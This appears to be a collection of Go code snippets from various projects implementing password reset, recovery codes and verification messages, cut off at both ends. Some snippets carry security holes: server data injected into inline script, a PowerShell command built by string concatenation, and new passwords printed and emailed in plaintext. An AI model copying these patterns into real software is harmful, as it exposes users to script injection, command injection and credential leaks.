Menu</a></h4><script>document.getElementById('MsgToUser').innerHTML = '%v';</script>\", Data.MsgToUser)\r\n\t\t}\r\n\t}\r\n\ttpl.ExecuteTemplate(res, \"ChangePassword.gohtml\", Data)\r\n}", "func (db *MySQLDB) MarkTOTPRecoveryCodeUsed(ctx context.Context, user *User, code string) error {\n\tfLog := mysqlLog.WithField(\"func\", \"MarkTOTPRecoveryCodeUsed\").WithField(\"RequestID\", ctx.Value(constants.RequestID))\n\n\trexp := regexp.MustCompile(`^[A-Z0-9]{8}$`)\n\tif rexp.Match([]byte(code)) {\n\t\tq := \"UPDATE HANSIP_TOTP_RECOVERY_CODES SET USED_FLAG = ? WHERE USER_REC_ID = ? AND RECOVERY_CODE=?\"\n\t\t_, err := db.instance.ExecContext(ctx, q, 1, user.RecID, code)\n\t\tif err != nil {\n\t\t\tfLog.Errorf(\"db.instance.ExecContext got %s. SQL = %s\", err.Error(), q)\n\t\t\treturn &ErrDBExecuteError{\n\t\t\t\tWrapped: err,\n\t\t\t\tMessage: \"Error MarkTOTPRecoveryCodeUsed\",\n\t\t\t\tSQL: q,\n\t\t\t}\n\t\t}\n\t\treturn nil\n\t}\n\tfLog.Warnf(\"Invalid Code format. expect 8 digit contains capital Alphabet and number only. But %s\", code)\n\treturn nil\n}", "func SendResetEmail(to string, code string) error {\n\tsubject := \"TrekNext Password Reset\"\n\thtml := fmt.Sprintf(\"<h4>We have received a request to reset the password associated with your email.</h4><p>Here is your reset password link: %s/reset/%s </p>\", environment.CLIENT_URL, code)\n\tfrom := \"[email protected]\"\n\treturn send(to, subject, html, from)\n}", "func resetPassword(w http.ResponseWriter, req *http.Request) {\n\n\tuserData, _ := getUserAndSession(w, req)\n\n\tif !userData.LoggedIn {\n\t\thttp.Redirect(w, req, \"/\", http.StatusSeeOther)\n\t\treturn\n\t}\n\n\tif req.Method == http.MethodPost {\n\n\t\t// Get posted password\n\t\tnewPassword := req.FormValue(\"password\")\n\n\t\t// Ecrypt password before storing it. If the encryption errs, respond with\n\t\t// an Internal Server Error.\n\t\tencryptedPassword, err := getEncryptedPassword(newPassword)\n\t\tif err != nil {\n\t\t\thttp.Error(w, \"Internal server error\", http.StatusInternalServerError)\n\t\t\treturn\n\t\t}\n\n\t\t// Update user in dbUsers map\n\t\tuserData.Password = encryptedPassword\n\t\tdbUsers[userData.UserID] = userData\n\n\t\t// Redirect to Home page after changing password\n\t\thttp.Redirect(w, req, \"/\", http.StatusSeeOther)\n\t\treturn\n\t}\n\n\ttpl.ExecuteTemplate(w, \"resetPassword.gohtml\", userData)\n}", "func ResetPassword(db db.Storer, email, tok, newpass string) error {\n\tvalid, err := verifyResetToken(db, email, tok)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tif !valid {\n\t\treturn fmt.Errorf(\"Invalid reset token\")\n\t}\n\n\tuser, err := GetUserWithEmail(db, email)\n\tif err != nil {\n\t\treturn err\n\t}\n\tif Ispasswordmatchwithprevfivepass(db, user.UserID, newpass) {\n\t\treturn errors.New(\"History says that you have used this new password in the past\")\n\t}\n\n\treturn UpdatePassword(db, user.UserID, newpass)\n}", "func (handler *Handler) handlePasswordResetPut(w http.ResponseWriter, r *http.Request) {\n\n\t//Define a local struct to get the email out of the request\n\ttype ResetGet struct {\n\t\tEmail string `json:\"email\"`\n\t\tResetToken string `json:\"reset_token\"`\n\t\tPassword string `json:\"password\"`\n\t}\n\n\t//Create a new password change object\n\tinfo := ResetGet{}\n\n\t//Now get the json info\n\terr := json.NewDecoder(r.Body).Decode(&info)\n\tif err != nil {\n\t\tutils.ReturnJsonError(w, http.StatusUnprocessableEntity, err)\n\t\treturn\n\n\t}\n\n\t//Lookup the user id\n\tuser, err := handler.userHelper.GetUserByEmail(info.Email)\n\n\t//Return the error\n\tif err != nil {\n\t\tutils.ReturnJsonStatus(w, http.StatusForbidden, false, \"password_change_forbidden\")\n\t\treturn\n\t}\n\n\t//Try to use the token\n\trequestId, err := handler.userHelper.CheckForResetToken(user.Id(), info.ResetToken)\n\n\t//Return the error\n\tif err != nil {\n\t\tutils.ReturnJsonStatus(w, http.StatusForbidden, false, \"password_change_forbidden\")\n\t\treturn\n\t}\n\n\t//Now update the password\n\terr = handler.userHelper.passwordChangeForced(user.Id(), user.Email(), info.Password)\n\t//Return the error\n\tif err != nil {\n\t\tutils.ReturnJsonError(w, http.StatusForbidden, err)\n\t\treturn\n\t}\n\t//Mark the request as used\n\terr = handler.userHelper.UseToken(requestId)\n\n\t//Check to see if the user was created\n\tif err == nil {\n\t\tutils.ReturnJsonStatus(w, http.StatusAccepted, true, \"password_change_success\")\n\t} else {\n\t\tutils.ReturnJsonError(w, http.StatusForbidden, err)\n\t}\n}", "func ResetPassword(params graphql.ResolveParams) (interface{}, error) {\n\to := orm.NewOrm()\n\tphoneStr := params.Args[\"phone\"].(string)\n\tmsgCodeStr := params.Args[\"smsCode\"].(string)\n\tpasswordStr := params.Args[\"password\"].(string)\n\n\trootValue := params.Info.RootValue.(map[string]interface{})\n\n\tsessPhone := rootValue[\"phone\"]\n\tsessMsgCode := rootValue[\"smsCode\"]\n\n\tif sessPhone == nil || sessMsgCode == nil || phoneStr != sessPhone || msgCodeStr != sessMsgCode {\n\t\t// 用户发送验证码的手机号与提交注册时的手机号不匹配,按照验证码不正确处理\n\t\treturn nil, models.Error{Message: \"smsCode incorrect.\"}\n\t}\n\n\t// validate password\n\tif len(passwordStr) < 6 {\n\t\treturn nil, models.Error{Message: \"password is too short.\"}\n\t}\n\n\tuser := models.User{Phone: phoneStr}\n\tif err := o.Read(&user, \"phone\"); err != nil {\n\t\treturn nil, models.Error{Message: \"get user failed.\", OriErr: err}\n\t}\n\n\tuser.Password = utils.Encrypt(passwordStr)\n\tif _, err := o.Update(&user, \"password\"); err != nil {\n\t\treturn nil, models.Error{Message: \"update password failed.\", OriErr: err}\n\t}\n\n\trootValue[\"currentUser\"] = nil\n\trootValue[\"smsCode\"] = nil\n\trootValue[\"setSession\"] = []string{\"currentUser\", \"smsCode\"}\n\n\treturn user, nil\n}", "func (u *UsersController) Reset(ctx *gin.Context) {\n\tvar userJSON userResetJSON\n\tctx.Bind(&userJSON)\n\tvar userIn tat.User\n\tuserIn.Username = strings.TrimSpace(userJSON.Username)\n\tuserIn.Email = strings.TrimSpace(userJSON.Email)\n\tcallback := strings.TrimSpace(userJSON.Callback)\n\n\tif len(userIn.Username) < 3 || len(userIn.Email) < 7 {\n\t\terr := fmt.Errorf(\"Invalid username (%s) or email (%s)\", userIn.Username, userIn.Email)\n\t\tAbortWithReturnError(ctx, http.StatusInternalServerError, err)\n\t\treturn\n\t}\n\n\ttokenVerify, err := userDB.AskReset(&userIn)\n\tif err != nil {\n\t\tlog.Errorf(\"Error while AskReset %s\", err)\n\t\tctx.JSON(http.StatusInternalServerError, gin.H{\"error\": err.Error()})\n\t\treturn\n\t}\n\n\tgo userDB.SendAskResetEmail(userIn.Username, userIn.Email, tokenVerify, callback)\n\tctx.JSON(http.StatusCreated, gin.H{\"info\": \"please check your mail to validate your account\"})\n}", "func (u *UsersViews) ForgotPasswordView(c echo.Context) error {\n\tvar email map[string]string\n\terr := (&echo.DefaultBinder{}).BindBody(c, &email)\n\tif err != nil {\n\t\treturn utils.RequestBodyError\n\t}\n\n\tuser := u.controller.GetUserByEmail(email[\"email\"])\n\tif user == nil {\n\t\treturn utils.InvalidInput(\"email\", \"email does not exist\")\n\t}\n\n\tok := utils.SendChangePasswordEmail(user)\n\tif !ok {\n\t\treturn echo.NewHTTPError(500, \"unable to send email\")\n\t}\n\n\treturn c.JSON(200, \"we send you and email please check your email\")\n}", "func (db *MyConfigurations) sendVerificationCode(c echo.Context) error {\n\tuserID, _ := getUserStatus(&c)\n\tvar user models.User\n\tdb.GormDB.First(&user, userID)\n\tif user.ValidPhoneNumber { // checks that the number is not verified (as no point in sending a verification code for a verified number)\n\t\treturn c.JSON(http.StatusOK, map[string]string{ // inform the user that the number is verified\n\t\t\t\"status\": \"failure\",\n\t\t\t\"message\": \"لقد تم تفعيل هذا الرقم من قبل! سوف يتم تجاهل طلبك\",\n\t\t})\n\t}\n\tcode, _ := getRandNum() // gets a random number\n\totp := models.OTP{ // create a OneTimePassword (OTP)\n\t\tUserID: userID,\n\t\tPhoneNumber: user.PhoneNumber,\n\t\tVerificationCode: code,\n\t\tType: \"phone number\",\n\t}\n\tdb.GormDB.Create(&otp)\n\tmessage := generateUTF16Message(\"كود التفعيل الخاص بالهاتف هو \" + code) // gets the UTF-16 encoding\n\tsendMessage(user.PhoneNumber, message) // send the message\n\treturn nil\n}", "func (ctr *RegistRequestController) ResendEmailRegister(c echo.Context) error {\n\tresendEmailParams := new(param.ResendEmailParams)\n\n\tif err := c.Bind(resendEmailParams); err != nil {\n\t\tmsgErrBind := err.Error()\n\t\tfieldErr := utils.GetFieldBindForm(msgErrBind)\n\n\t\tif fieldErr != \"\" {\n\t\t\treturn c.JSON(http.StatusOK, cf.JsonResponse{\n\t\t\t\tStatus: cf.FailResponseCode,\n\t\t\t\tMessage: \"Invalid field \" + fieldErr,\n\t\t\t})\n\t\t}\n\t}\n\n\trequestObj, err := ctr.RegistRequestRepo.GetRegRequestsByID(resendEmailParams.RequestID)\n\tif err != nil {\n\t\tif err.Error() == pg.ErrNoRows.Error() {\n\t\t\treturn c.JSON(http.StatusOK, cf.JsonResponse{\n\t\t\t\tStatus: cf.FailResponseCode,\n\t\t\t\tMessage: \"Request is not exists\",\n\t\t\t})\n\t\t}\n\n\t\treturn c.JSON(http.StatusInternalServerError, cf.JsonResponse{\n\t\t\tStatus: cf.FailResponseCode,\n\t\t\tMessage: \"System error\",\n\t\t})\n\t}\n\n\tnewestRegistCode, err := ctr.RegCodeRepo.GetNewRegistCodeByRequestID(resendEmailParams.RequestID)\n\tif err != nil {\n\t\tif err.Error() != pg.ErrNoRows.Error() {\n\t\t\treturn c.JSON(http.StatusInternalServerError, cf.JsonResponse{\n\t\t\t\tStatus: cf.FailResponseCode,\n\t\t\t\tMessage: \"System error\",\n\t\t\t})\n\t\t}\n\t}\n\n\tif !newestRegistCode.ExpiredAt.IsZero() && newestRegistCode.ExpiredAt.After(utils.TimeNowUTC()) {\n\t\treturn c.JSON(http.StatusInternalServerError, cf.JsonResponse{\n\t\t\tStatus: cf.FailResponseCode,\n\t\t\tMessage: \"The register code is not expired yet, please check your email and spam mail\",\n\t\t})\n\t}\n\n\tresendEmailParams.Email = requestObj.Email\n\tregCodeObj, err := ctr.RegistRequestRepo.GetResendRegistCode(ctr.RegCodeRepo, resendEmailParams)\n\n\tif err != nil {\n\t\treturn c.JSON(http.StatusInternalServerError, cf.JsonResponse{\n\t\t\tStatus: cf.FailResponseCode,\n\t\t\tMessage: \"System error\",\n\t\t})\n\t}\n\n\tuserProfile := c.Get(\"user_profile\").(m.User)\n\torg, err := ctr.OrgRepo.SelectEmailAndPassword(userProfile.OrganizationID)\n\tif err != nil {\n\t\treturn c.JSON(http.StatusInternalServerError, cf.JsonResponse{\n\t\t\tStatus: cf.FailResponseCode,\n\t\t\tMessage: \"System error\",\n\t\t})\n\t}\n\tif org.Email == \"\" || org.EmailPassword == \"\" {\n\t\treturn c.JSON(http.StatusUnprocessableEntity, cf.JsonResponse{\n\t\t\tStatus: cf.FailResponseCode,\n\t\t\tMessage: \"Your organization must have an email\",\n\t\t})\n\t}\n\n\tctr.InitSmtp(org.Email, org.EmailPassword)\n\n\tsampleData := new(param.SampleData)\n\tsampleData.SendTo = []string{regCodeObj.Email}\n\tsampleData.URL = os.Getenv(\"BASE_SPA_URL\") + \"/organization/create-organization/\" + regCodeObj.Code\n\tif err := ctr.SendMail(\"Micro Erp Registration Email\", sampleData, cf.CreateOrganizationTemplate); err != nil {\n\t\tctr.Logger.Error(err)\n\t\treturn c.JSON(http.StatusInternalServerError, cf.JsonResponse{\n\t\t\tStatus: cf.FailResponseCode,\n\t\t\tMessage: \"System error\",\n\t\t})\n\t}\n\n\treturn c.JSON(http.StatusOK, cf.JsonResponse{\n\t\tStatus: cf.SuccessResponseCode,\n\t\tMessage: \"Success\",\n\t})\n}", "func (h *UserRepos) ResetConfirm(ctx context.Context, w http.ResponseWriter, r *http.Request, params map[string]string) error {\n\n\tresetHash := params[\"hash\"]\n\n\tctxValues, err := webcontext.ContextValues(ctx)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t//\n\treq := new(user.UserResetConfirmRequest)\n\tdata := make(map[string]interface{})\n\tf := func() (bool, error) {\n\n\t\tif r.Method == http.MethodPost {\n\t\t\terr := r.ParseForm()\n\t\t\tif err != nil {\n\t\t\t\treturn false, err\n\t\t\t}\n\n\t\t\tdecoder := schema.NewDecoder()\n\t\t\tif err := decoder.Decode(req, r.PostForm); err != nil {\n\t\t\t\treturn false, err\n\t\t\t}\n\n\t\t\t// Append the query param value to the request.\n\t\t\treq.ResetHash = resetHash\n\n\t\t\tu, err := h.UserRepo.ResetConfirm(ctx, *req, ctxValues.Now)\n\t\t\tif err != nil {\n\t\t\t\tswitch errors.Cause(err) {\n\t\t\t\tcase user.ErrResetExpired:\n\t\t\t\t\twebcontext.SessionFlashError(ctx,\n\t\t\t\t\t\t\"Reset Expired\",\n\t\t\t\t\t\t\"The reset has expired.\")\n\t\t\t\t\treturn false, nil\n\t\t\t\tdefault:\n\t\t\t\t\tif verr, ok := weberror.NewValidationError(ctx, err); ok {\n\t\t\t\t\t\tdata[\"validationErrors\"] = verr.(*weberror.Error)\n\t\t\t\t\t\treturn false, nil\n\t\t\t\t\t} else {\n\t\t\t\t\t\treturn false, err\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\n\t\t\t// Authenticated the user. Probably should use the default session TTL from UserLogin.\n\t\t\ttoken, err := h.AuthRepo.Authenticate(ctx, user_auth.AuthenticateRequest{\n\t\t\t\tEmail: u.Email,\n\t\t\t\tPassword: req.Password,\n\t\t\t}, time.Hour, ctxValues.Now)\n\t\t\tif err != nil {\n\t\t\t\tif verr, ok := weberror.NewValidationError(ctx, err); ok {\n\t\t\t\t\tdata[\"validationErrors\"] = verr.(*weberror.Error)\n\t\t\t\t\treturn false, nil\n\t\t\t\t} else {\n\t\t\t\t\treturn false, err\n\t\t\t\t}\n\t\t\t}\n\n\t\t\t// Add the token to the users session.\n\t\t\terr = handleSessionToken(ctx, w, r, token)\n\t\t\tif err != nil {\n\t\t\t\treturn false, err\n\t\t\t}\n\n\t\t\t// Redirect the user to the dashboard.\n\t\t\treturn true, web.Redirect(ctx, w, r, \"/\", http.StatusFound)\n\t\t}\n\n\t\t_, err = user.ParseResetHash(ctx, h.SecretKey, resetHash, ctxValues.Now)\n\t\tif err != nil {\n\t\t\tswitch errors.Cause(err) {\n\t\t\tcase user.ErrResetExpired:\n\t\t\t\twebcontext.SessionFlashError(ctx,\n\t\t\t\t\t\"Reset Expired\",\n\t\t\t\t\t\"The reset has expired.\")\n\t\t\t\treturn false, nil\n\t\t\tdefault:\n\t\t\t\tif verr, ok := weberror.NewValidationError(ctx, err); ok {\n\t\t\t\t\tdata[\"validationErrors\"] = verr.(*weberror.Error)\n\t\t\t\t\treturn false, nil\n\t\t\t\t} else {\n\t\t\t\t\treturn false, err\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\treturn false, nil\n\t}\n\n\tend, err := f()\n\tif err != nil {\n\t\treturn web.RenderError(ctx, w, r, err, h.Renderer, TmplLayoutBase, TmplContentErrorGeneric, web.MIMETextHTMLCharsetUTF8)\n\t} else if end {\n\t\treturn nil\n\t}\n\n\tdata[\"form\"] = req\n\n\tif verr, ok := weberror.NewValidationError(ctx, webcontext.Validator().Struct(user.UserResetConfirmRequest{})); ok {\n\t\tdata[\"validationDefaults\"] = verr.(*weberror.Error)\n\t}\n\n\treturn h.Renderer.Render(ctx, w, r, TmplLayoutBase, \"user-reset-confirm.gohtml\", web.MIMETextHTMLCharsetUTF8, http.StatusOK, data)\n}", "func SendResetToken(qr db.Queryer, email, resetURL string) error {\n\tt, err := genResetToken(qr, email)\n\tif err != nil {\n\t\treturn err\n\t}\n\ttok := encodeResetToken(t)\n\n\trurl := fmt.Sprintf(\"%s?t=%s\", resetURL, tok)\n\tmailer := smtp.SMTP{}\n\n\tfname := fmt.Sprintf(\"%v/%v\", defTemplatePath, \"resetpass.html\")\n\ttmp, err := template.ParseFiles(fname)\n\tif err != nil {\n\t\treturn err\n\t}\n\tp := struct {\n\t\tLink string\n\t}{Link: rurl}\n\tvar b bytes.Buffer\n\terr = tmp.Execute(&b, p)\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn mailer.Send(\"Password Reset\", b.String(), nil, email)\n}", "func resetPwdAPI(w http.ResponseWriter, r *http.Request) handler.JSON {\n\tresp := appHandler.JSONResponse(w, r)\n\tparams := resp.Params()\n\tpwd := clib.MustGetMinMaxStringFromDict(params, \"pwd\", appDef.LenMinUserPwd, appDef.LenMaxUserPwd)\n\tkey := clib.MustGetStringFromDict(params, \"key\", -1)\n\n\tuidStr, err := appService.Get().ResetPwdVerifier.Verify(key)\n\tappcm.PanicOn(err, \"failed to verify reset password key\")\n\n\tlang := appcm.ContextLanguage(r.Context())\n\tls := appHandler.MainPage().Dictionary(lang)\n\tif uidStr == \"\" {\n\t\treturn resp.MustFail(ls.ResetPwdSessionExpiredErr)\n\t}\n\n\ttargetUID, err := strconvx.ParseUint64(uidStr)\n\tappcm.PanicOn(err, \"failed to parse UID\")\n\n\tif targetUID == 0 {\n\t\treturn resp.MustFail(\"unexpected 0 UID\")\n\t}\n\n\tpwdHash, err := appService.Get().HashingAlg.CreateHash(pwd)\n\tappcm.PanicOn(err, \"failed to create hash\")\n\n\tdb := appDB.DB()\n\thasPwd, err := da.UserPwd.HasUser(db, targetUID)\n\tappcm.PanicOn(err, \"failed to check if user has password\")\n\n\tif !hasPwd {\n\t\treturn resp.MustFail(\"user has no password\")\n\t}\n\n\t// Update password.\n\terr = da.UserPwd.UpdateHashByID(db, targetUID, pwdHash)\n\tappcm.PanicOn(err, \"failed to update password\")\n\n\t// TODO: force logout all sessions!\n\treturn resp.MustComplete(nil)\n}", "func (as *AdminServer) ResetPassword(w http.ResponseWriter, r *http.Request) {\n\tu := ctx.Get(r, \"user\").(models.User)\n\tsession := ctx.Get(r, \"session\").(*sessions.Session)\n\tif !u.PasswordChangeRequired {\n\t\tFlash(w, r, \"info\", \"Please reset your password through the settings page\")\n\t\tsession.Save(r, w)\n\t\thttp.Redirect(w, r, \"/settings\", http.StatusTemporaryRedirect)\n\t\treturn\n\t}\n\tparams := newTemplateParams(r)\n\tparams.Title = \"Reset Password\"\n\tswitch {\n\tcase r.Method == http.MethodGet:\n\t\tparams.Flashes = session.Flashes()\n\t\tsession.Save(r, w)\n\t\tgetTemplate(w, \"reset_password\").ExecuteTemplate(w, \"base\", params)\n\t\treturn\n\tcase r.Method == http.MethodPost:\n\t\tnewPassword := r.FormValue(\"password\")\n\t\tconfirmPassword := r.FormValue(\"confirm_password\")\n\t\tnewHash, err := auth.ValidatePasswordChange(u.Hash, newPassword, confirmPassword)\n\t\tif err != nil {\n\t\t\tFlash(w, r, \"danger\", err.Error())\n\t\t\tparams.Flashes = session.Flashes()\n\t\t\tsession.Save(r, w)\n\t\t\tw.WriteHeader(http.StatusBadRequest)\n\t\t\tgetTemplate(w, \"reset_password\").ExecuteTemplate(w, \"base\", params)\n\t\t\treturn\n\t\t}\n\t\tu.PasswordChangeRequired = false\n\t\tu.Hash = newHash\n\t\tif err = models.PutUser(&u); err != nil {\n\t\t\tFlash(w, r, \"danger\", err.Error())\n\t\t\tparams.Flashes = session.Flashes()\n\t\t\tsession.Save(r, w)\n\t\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\t\tgetTemplate(w, \"reset_password\").ExecuteTemplate(w, \"base\", params)\n\t\t\treturn\n\t\t}\n\t\t// TODO: We probably want to flash a message here that the password was\n\t\t// changed successfully. The problem is that when the user resets their\n\t\t// password on first use, they will see two flashes on the dashboard-\n\t\t// one for their password reset, and one for the \"no campaigns created\".\n\t\t//\n\t\t// The solution to this is to revamp the empty page to be more useful,\n\t\t// like a wizard or something.\n\t\tas.nextOrIndex(w, r)\n\t}\n}", "func (s Service) GenerateRecoveryCode(ctx context.Context, login string) error {\n\tspan := s.tracer.MakeSpan(ctx, \"GenerateRecoveryCode\")\n\tspan.Finish()\n\n\t// TODO: validate data!\n\n\tid, email, err := s.repository.Users.GetUserIDAndPrimaryEmailByLogin(ctx, login)\n\tif err != nil {\n\t\ts.tracer.LogError(span, err)\n\t\t// internal error\n\t\treturn err\n\t}\n\n\tcode, err := s.repository.Cache.CreateTemporaryCodeForRecoveryByEmail(id)\n\tif err != nil {\n\t\ts.tracer.LogError(span, err)\n\t\t// internal error\n\t\treturn err\n\t}\n\n\tmessage := fmt.Sprint(\"<html><body><a target='_blank' href='http://\"+s.Host+\"/user/PasswordRecovery?token=\", code, \"&user_id=\", id, \"'>Recover</a></body></html>\")\n\tlog.Println(message)\n\n\t// err = s.mailRPC.SendEmail(ctx, email, fmt.Sprint(\"<html><body><a target='_blank' href='http://\"+s.Host+\"/user/PasswordRecovery?token=\", code, \"&user_id=\", id, \"'>Recover</a></body></html>\"))\n\terr = s.mq.SendEmail(email, \"Recover\", message)\n\tif err != nil {\n\t\ts.tracer.LogError(span, err)\n\t}\n\n\tif err != nil {\n\t\ts.tracer.LogError(span, err)\n\t\t// internal error\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func ForgotPasswordGetHandler(ctx *enliven.Context) {\n\tif !ctx.Enliven.Core.Email.Enabled() {\n\t\tctx.Forbidden()\n\t\treturn\n\t}\n\n\tctx.ExecuteBaseTemplate(\"user_forgot_password\")\n}", "func resetPassword(model *ResetPasswordModel) api.Response {\n\tif model.Password != model.PasswordConfirmation {\n\t\treturn api.BadRequest(ErrPasswordsDoNotMatch)\n\t}\n\n\tvar err = auth.ResetPassword(model.Token, model.Password)\n\tif err != nil {\n\t\tif err == auth.ErrResetPasswordTokenExpired {\n\t\t\treturn api.BadRequest(err)\n\t\t}\n\n\t\treturn api.InternalServerError(err)\n\t}\n\n\treturn api.StatusResponse(http.StatusNoContent)\n}", "func PostManageForgotPasswordToken(body interface{}) (AccountTokens, error) {\n\tdata := new(AccountTokens)\n\treq, reqErr := CreateRequest(\"POST\", os.Getenv(\"DOMAIN\")+\"/identity/v2/manage/account/forgot/token\", body)\n\tif reqErr != nil {\n\t\treturn *data, reqErr\n\t}\n\n\treq.Header.Add(\"content-Type\", \"application/json\")\n\treq.Header.Add(\"X-LoginRadius-ApiKey\", os.Getenv(\"APIKEY\"))\n\treq.Header.Add(\"X-LoginRadius-ApiSecret\", os.Getenv(\"APISECRET\"))\n\n\terr := RunRequest(req, data)\n\treturn *data, err\n}", "func ResetPassword(ticket *Task) {\n\n\tprintln(\"Login: \", ticket.User)\n\tpassword := newPassword(20)\n\tprintln(\"Password :\", password)\n\tcommand := exec.Command(\"PowerShell\", \"-Command\", \"Set-ADAccountPassword\", \"-Identity \"+ticket.User, \"-Reset\", \"-NewPassword (ConvertTo-SecureString -AsPlainText \"+password+\" -Force)\")\n\terr := run(command, ticket)\n\tif err != nil {\n\t\tprintln(\"Error\")\n\t\tchangeStatus(ticket, \"error\")\n\t\tsend(err.Error(), \"Error detected \"+\"For support\", \"[email protected]\")\n\t\t//log.Fatal(err)\n\t} else {\n\t\tsend(\"Password has been reset\\n\"+\"New password is :\"+password+\"\\n Verify your connection: RDP 35.231.245.199\", \"Reset password for account \"+ticket.User, ticket.Email)\n\t\tchangeStatus(ticket, \"done\")\n\t\tprintln(\"Action: password has been reset\")\n\t\tfmt.Println(\"Done\")\n\t}\n}", "func (f *Firebase) ResetPassword(w http.ResponseWriter, r *http.Request) {\n\tw.Header().Set(\"Content-Type\", \"application/json; charset=UTF-8\")\n\tw.WriteHeader(http.StatusOK)\n}", "func sendpassword(email, newpass string) error {\n\tm := gomail.NewMessage()\n\tm.SetHeader(\"From\", mailfrom)\n\tm.SetHeader(\"To\", email)\n\tm.SetHeader(\"Subject\", \"Nouveau compte\")\n\tm.SetBody(\"text/plain\", \"Bienvenue, ton email est : \"+email+\" et ton pass est : \"+newpass)\n\n\td := gomail.NewDialer(smtpserver, smtpport, \"\", \"\")\n\n\tif err := d.DialAndSend(m); err != nil {\n\t\treturn errors.New(\"Connexion impossible avec le serveur smtp\")\n\t}\n\treturn nil\n}", "func (w *ServerInterfaceWrapper) Passwordresetrequest(ctx echo.Context) error {\n\tvar err error\n\n\t// Invoke the callback with all the unmarshalled arguments\n\terr = w.Handler.Passwordresetrequest(ctx)\n\treturn err\n}", "func VerifyEmail(w http.ResponseWriter, r *http.Request, DB *gorm.DB) {\n\t//Endpoint to verify user email\n\t//create new route that pulls the query params and checks if it is the same as what has been saved in the user table\n\t//if it is the same then update the user row and change verified to true\n\t//if not the same ask them to request new verification token to email\n\ttoken := r.URL.Query().Get(\"token\")\n\tvar dbUser User\n\t//find the user\n\tDB.Where(\"verify_token = ?\", token).First(&dbUser)\n\t//Check if the user has already verified their account to save a db call if they have\n\tif dbUser != (User{}) {\n\t\tif dbUser.EmailVerified != true {\n\t\t\tw.Header().Set(\"Content-Type\", \"application/json\")\n\t\t\tw.WriteHeader(http.StatusOK)\n\t\t\tDB.Model(&dbUser).Where(\"Verify_Token = ?\", token).Updates(map[string]interface{}{\"EmailVerified\": true, \"VerifyToken\": \"\"})\n\t\t\tupdateResponse := response.JsonResponse(\"Email Verified Successfully\", 200)\n\t\t\tjson.NewEncoder(w).Encode(updateResponse)\n\t\t} else {\n\t\t\tw.Header().Set(\"Content-Type\", \"application/json\")\n\t\t\tw.WriteHeader(http.StatusConflict)\n\t\t\talreadyResponse := response.JsonResponse(\"Email Already Verified\", 409)\n\t\t\tjson.NewEncoder(w).Encode(alreadyResponse)\n\t\t}\n\t} else {\n\t\terrorResponse := response.JsonResponse(\"An error occured while verifying your email\", 500)\n\t\tw.Header().Set(\"Content-Type\", \"application/json\")\n\t\tw.WriteHeader(http.StatusNotFound)\n\t\tjson.NewEncoder(w).Encode(errorResponse)\n\t}\n\n}", "func (UserService) ResetPassword(gDto dto.GeneralGetDto) string {\n\tsalt, _ := account.MakeSalt()\n\t//pwd, _ := account.HashPassword(dto.Password, salt)\n\tu := userDao.Get(gDto.Id, false)\n\tautoPwd := utils.RandomPwd(10)\n\tpwd, _ := account.HashPassword(autoPwd, salt)\n\t//u.Password = pwd\n\t//u.Salt = salt\n\tuserDao.Update(&u, map[string]interface{}{\n\t\t\"password\": pwd,\n\t\t\"salt\": salt,\n\t})\n\treturn autoPwd\n}", "func (self *Apn) GetVerificationCode(rw web.ResponseWriter, req *web.Request) {\n\n\tif req.Method != \"POST\" {\n\t\tlog.Error(\"signUp must be post request\")\n\t\tFail(rw)\n\t\treturn\n\t}\n\n\tremoteIP, _ := xstring.CheckIpAndPort(req.RemoteAddr)\n\tif !security.CheckIpValid(remoteIP, 10) {\n\t\tSuccess(rw)\n\t\trw.Write(xjson.Encode(packet.OkPacket{Code: 0, Message: \"get verification code more times\"}))\n\t\treturn\n\t}\n\n\tbody, err := ioutil.ReadAll(req.Body)\n\tif err != nil {\n\t\tlog.Error(\"read request error\", err)\n\t\tFail(rw)\n\t\treturn\n\t}\n\n\tgetCode := &GetCode{}\n\terr = json.Unmarshal(body, &getCode)\n\tif err != nil {\n\t\tlog.Error(\"decode the json packet error:\", err)\n\t\tFail(rw)\n\t\treturn\n\t}\n\n\tif user.IsUsernameRegistered(getCode.Phone) {\n\t\tif !getCode.MustRegistered {\n\t\t\tSuccess(rw)\n\t\t\trw.Write(xjson.Encode(packet.OkPacket{Code: 0, Message: \"phone has registered\"}))\n\t\t\treturn\n\t\t}\n\t} else {\n\t\tif getCode.MustRegistered {\n\t\t\tSuccess(rw)\n\t\t\trw.Write(xjson.Encode(packet.OkPacket{Code: 0, Message: \"the phone has not registered\"}))\n\t\t\treturn\n\t\t}\n\t}\n\n\terr = xdingdong.Send(getCode.Phone, getCode.Code)\n\tif err != nil {\n\t\tlog.Error(\"send code error:\", err)\n\t\tFail(rw)\n\t\treturn\n\t}\n\n\tSuccess(rw)\n\trw.Write(xjson.Encode(packet.OkPacket{Code: 1}))\n\treturn\n}", "func (context *DbContext) ResetPassword(username string, recoveryToken string, newPassword string) ConnectUserResponse {\n\n\tid := context.IDFromUsername(username)\n\tif id == 0 {\n\t\treturn invalidConnectUserResponse()\n\t}\n\n\tif !ValidatePassword(newPassword) {\n\t\treturn invalidConnectUserResponse()\n\t}\n\n\tstmt, err := context.Db.Prepare(\"SELECT Expiration FROM UserRecoveryTokens WHERE IdUser = ? AND Token = ?\")\n\tcheckErr(err)\n\tdefer stmt.Close()\n\n\tvar expiration time.Time\n\terr = stmt.QueryRow(id, recoveryToken).Scan(&expiration)\n\n\tif err == sql.ErrNoRows {\n\t\treturn invalidConnectUserResponse()\n\t}\n\tcheckErr(err)\n\n\tif time.Now().After(expiration) {\n\t\treturn invalidConnectUserResponse()\n\t}\n\n\tnewExpiration := time.Now()\n\n\tstmt2, err := context.Db.Prepare(\"UPDATE UserRecoveryTokens SET Expiration = ? WHERE IdUser = ? AND Token = ?\")\n\tcheckErr(err)\n\tdefer stmt2.Close()\n\n\t_, err = stmt2.Exec(newExpiration, id, recoveryToken)\n\n\t// Hashing the password with the default cost of 10\n\thashedPassword, err := bcrypt.GenerateFromPassword([]byte(context.saltPassword(newPassword)), bcrypt.DefaultCost)\n\tcheckErr(err)\n\n\tstmt3, err := context.Db.Prepare(\"UPDATE UserAuthentications SET Password = ? WHERE IdUser = ?\")\n\tcheckErr(err)\n\tdefer stmt.Close()\n\n\t_, err = stmt3.Exec(hashedPassword, 